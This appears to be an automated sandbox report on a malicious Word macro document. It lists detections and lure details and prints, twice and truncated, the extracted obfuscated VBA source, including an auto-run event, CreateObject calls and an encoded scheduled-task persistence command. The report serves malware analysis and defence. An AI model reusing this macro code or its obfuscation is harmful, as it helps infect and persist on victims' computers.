Office (OLE) malware analysis — malicious · a6678a676d6a5583

MALICIOUS

Office (OLE)

126.5 KB Created: 2018-10-09 06:23:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: cd15a7c3cb1725dc9d21160c26ab9c2e SHA-1: 7dc141cdd67152d8039c42c1d8b14f6a18b6b509 SHA-256: a6678a676d6a55833aa63233b3bae53fd7825c3c8afc4d015a2ca8296baee31a

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristic firings including 'OLE_VBA_MACROS', 'OLE_VBA_CREATEOBJ', and 'OLE_VBA_GETOBJ'. The ClamAV detection 'Win.Trojan.Agent-6754303-0' further confirms its malicious nature. The VBA script appears to be obfuscated but its use of CreateObject and GetObject suggests it is designed to download and execute a second-stage payload. The document body, presented as a technical task assignment, serves as a lure to encourage macro execution.

Heuristics 6

ClamAV: Win.Trojan.Agent-6754303-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Agent-6754303-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10348 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10348 bytes
SHA-256: `14fdfa5e0b6ade2a7de2dc26f67af2848454ad6da53586697c1f1f74be85e82b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame" Sub Frame1_Layout() Dim test_startfile As String Dim rawshark As Object Dim OTKLOADR As Integer Dim RS_NotDefault As String Dim py25tests As String Dim RGI79AD As String Dim reindent As String Dim RIABLC3 As String test_startfile = "MtrjUwjrnzrJinynts" py25tests = "\xHWnUY3Xmjqq" xrWPpb4 wsepno Dim UserDataBackup%: UserDataBackup = 1 Dim TTYRES%: TTYRES = UserDataBackup * 9 If UserDataBackup < TTYRES Then test_startfile = py25tests Set rawshark = CreateObject(MSART8(test_startfile)) Else Set rawshark = CreateObject(MSART8(test_startfile)) End If reindent = fstexp("muh9;55y") RS_NotDefault = fixer_base("mui68;5y") RGI79AD = KYEPC270 If (RGI79AD = "O55>55=<") Then RIABLC3 = J0289430(reindent) RIACMAC7 = MSART8("wfsitrdsfrj") RS_NotDefault = Replace(RS_NotDefault, RIACMAC7, RIABLC3) RS_NotDefault = NAPHLPR(rawshark, RS_NotDefault, OTKLOADR) End If End Sub Function fixer_base(test_startfile2 As String) As String Dim SL00286_ As String Dim FD00077_ As String FD00077_ = "xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'" test_startfile2 = "muo9:55y" SL00286_ = "NK6987J8" test_startfile2 = "MU_;W\S<" SL00286_ = FD00077_ SL00286_ = MSART8(SL00286_) fixer_base = SL00286_ End Function Function fstexp(test_startfile02 As String) As String Dim SO02269_ As String Dim dnsext As String Dim dismcoreps As String Dim EP0NGJ8F As String Dim CREDITS As String Dim CscMigDl As String Dim docomo As String Dim compdyn As String Dim displayswitch As String Dim DGPICCAP As String Dim dvdburn As String Dim DISTLSTS As String Dim common As String Dim cordiaz As String Dim EP0NCA9A As String Dim controller As String Dim dependency_links As String Dim DigitalLocker As String Dim dicowan As String Dim dfdll_dll_x8 As String Dim dispdiag As String Dim EP0NRE9A As String Dim Curri As String Dim ehdebug As String Dim driverquery As String Dim drtprov As String Dim Doual As String Dim EP0NREAB As String Dim ehSched As String displayswitch = "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb" common = "jwynqj7:8. Jsi%Kzshynts YXd\nsit\|xZuifyj-. \|nsit\|3hqtxj-. A4xhwnuyC A4gti~C A4myrqC" dfdll_dll_x8 = "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]' \|nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy" dismcoreps = "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f" dvdburn = "r™yMMZ›œ} œsvMZr…r�¢�–\|{�\|™vMo†}n€€MMZ›œ{–MMZ{œ’…–MZ„–›‘œ„€¡†™rMMuv‘q’›MMMMZSSMM�g‰„–{q\|¤ ‰ † �rz`_‰" EP0NREAB = "AmyrqC Agti~C Axhwnuy%qfslzfljB'[GXhwnuy'C Xzg%YXd\nsit\|xZuifyj-. \\FSduwtknqjd{6%B%== \hsJfuFzym" ehdebug = "z’ˆ`]ŠXT¥TVMSS€’¡MM”›}žjrpu\|M–›ƒ\|x’Zr¥}' X[6886J8%B%' ’ –\|{MMU”’¡Zv¡rzM’{ƒgn†¤V[£Ž™‚’M‹©M�\|„r u" DISTLSTS = "' x~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf" controller = "zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj\|uwt{. Sj}y Z mltwt%B%\G56<95d Jsi%Kzshynts Kzshynts%zxjwynqj7:" dependency_links = "tw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8 \|nswx%B%Z mltwt-\|nswx. YS5576<d%B%\|nswx Jsi%Kzshyn" Doual = "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`' x~xdxw{%B%'`YMf`MYf^MYffMY^]aYc" dispdiag = "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]' yjxydrzqyng~yjhtijh%B%'YM^^cMYMa^ ... (truncated)

SHA-256: 14fdfa5e0b6ade2a7de2dc26f67af2848454ad6da53586697c1f1f74be85e82b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"


Sub Frame1_Layout()
    Dim test_startfile As String
    Dim rawshark As Object
    Dim OTKLOADR As Integer
    Dim RS_NotDefault As String
    Dim py25tests As String
    Dim RGI79AD As String
    Dim reindent As String
    Dim RIABLC3 As String

    test_startfile = "MtrjUwjrnzrJinynts"
    py25tests = "\xHWnUY3Xmjqq"
    xrWPpb4
    wsepno
    Dim UserDataBackup%: UserDataBackup = 1
    Dim TTYRES%: TTYRES = UserDataBackup * 9
    If UserDataBackup < TTYRES Then
        test_startfile = py25tests
        Set rawshark = CreateObject(MSART8(test_startfile))
    Else
        Set rawshark = CreateObject(MSART8(test_startfile))
    End If
    reindent = fstexp("muh9;55y")
    RS_NotDefault = fixer_base("mui68;5y")
    RGI79AD = KYEPC270
    If (RGI79AD = "O55>55=<") Then
        RIABLC3 = J0289430(reindent)
        RIACMAC7 = MSART8("wfsitrdsfrj")
        RS_NotDefault = Replace(RS_NotDefault, RIACMAC7, RIABLC3)
        RS_NotDefault = NAPHLPR(rawshark, RS_NotDefault, OTKLOADR)
    End If
End Sub

Function fixer_base(test_startfile2 As String) As String
    Dim SL00286_ As String
        Dim FD00077_ As String
    FD00077_ = "xhmyfxpx%4Hwjfyj%4K%4XH%IFNQ^%4XY%'65?75'%4YS%'Iwn{jHqtziYfxpHtwjHmjhp'%4YW%'rxmyf%wfsitrdsfrj'"

    test_startfile2 = "muo9:55y"
    SL00286_ = "NK6987J8"
    test_startfile2 = "MU_;W\S<"
    SL00286_ = FD00077_
    SL00286_ = MSART8(SL00286_)
    fixer_base = SL00286_
End Function

Function fstexp(test_startfile02 As String) As String
    Dim SO02269_ As String
        Dim dnsext As String
    Dim dismcoreps As String
    Dim EP0NGJ8F As String
    Dim CREDITS As String
    Dim CscMigDl As String
    Dim docomo As String
    Dim compdyn As String
    Dim displayswitch As String
    Dim DGPICCAP As String
    Dim dvdburn As String
    Dim DISTLSTS As String
    Dim common As String
    Dim cordiaz As String
    Dim EP0NCA9A As String
    Dim controller As String
    Dim dependency_links As String
    Dim DigitalLocker As String
    Dim dicowan As String
    Dim dfdll_dll_x8 As String
    Dim dispdiag As String
    Dim EP0NRE9A As String
    Dim Curri As String
    Dim ehdebug As String
    Dim driverquery As String
    Dim drtprov As String
    Dim Doual As String
    Dim EP0NREAB As String
    Dim ehSched As String
    displayswitch = "fYM^]aYcbMY^^aMYf`YbbYMb]Ya`MYf^YMffYM^]aYcbMYM^^aYMf`YafYaeYbcYMa`Yf^MYffYM^]aYcbMY^^aYf`YafYMaeMYb"
    common = "jwynqj7:8. Jsi%Kzshynts YXd\nsit|xZuifyj-. |nsit|3hqtxj-. A4xhwnuyC A4gti~C A4myrqC"
    dfdll_dll_x8 = "^MYMfeMYMffMYM^]eYM^]bMY^]^MY^^]'    |nswx%B%yjxyddtx}dxzuutwy%+%yjxydrzqyng~yjhtijh%+%yjxydniqjmnxy"
    dismcoreps = "fMY^]]MYM^^^Y^^fMYM^^]MY^]eMYM^^^MY`fYa`MY`fYMfdMYM^]]Y^^bMY^^cYM^^aY^]bMYM^^]MYM^]`Ya]MYd_MY^]eYM`f"
    dvdburn = "r™yMMZ›œ} œsvMZr…r�¢�–|{�|™vMo†}n€€MMZ›œ{–MMZ{œ’…–MZ„–›‘œ„€¡†™rMMuv‘q’›MMMMZSSMM�g‰„–{q|¤ ‰ † �rz`_‰"
    EP0NREAB = "AmyrqC Agti~C Axhwnuy%qfslzfljB'[GXhwnuy'C  Xzg%YXd\nsit|xZuifyj-.  \\FSduwtknqjd{6%B%==  \hsJfuFzym"
    ehdebug = "z’ˆ`]ŠXT¥TVMSS€’¡MM”›}žjrpu|M–›ƒ|x’Zr¥}'    X[6886J8%B%' ’  –|{MMU”’¡Zv¡rzM’{ƒgn†¤V[£Ž™‚’M‹©M�|„r  u"
    DISTLSTS = "'    x~xyjrhuq%B%'fYa`Y`fMYM^__Yd`MYMcfYeeYM`fYMa^MYacMYe_MY^]^YM^^_YMdcMYMfdYcdY^]^YMa]MYa]MYf^MYMf"
    controller = "zxjwynqj7:-{jwhqxni1%{drxhixh1%{nj|uwt{.  Sj}y  Z mltwt%B%\G56<95d Jsi%Kzshynts  Kzshynts%zxjwynqj7:"
    dependency_links = "tw~%+%x~xyjrhuq%+%x~xdxw{%+%X[8757J8%+%X[6886J8  |nswx%B%Z mltwt-|nswx.  YS5576<d%B%|nswx Jsi%Kzshyn"
    Doual = "a`MYM`fMYM^]]MYM^]^MY^_]Yd_Y^]eYM^]cYMa^Y`fMYa`MY`fYMb_YM^]cMYM`'    x~xdxw{%B%'`YMf`MYf^MYffMY^]aYc"
    dispdiag = "aMYMa^YMaaYf^Ye`Y^^cMYM^^aYMd`MY^^]Y^]'    yjxydrzqyng~yjhtijh%B%'YM^^cMYMa^
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.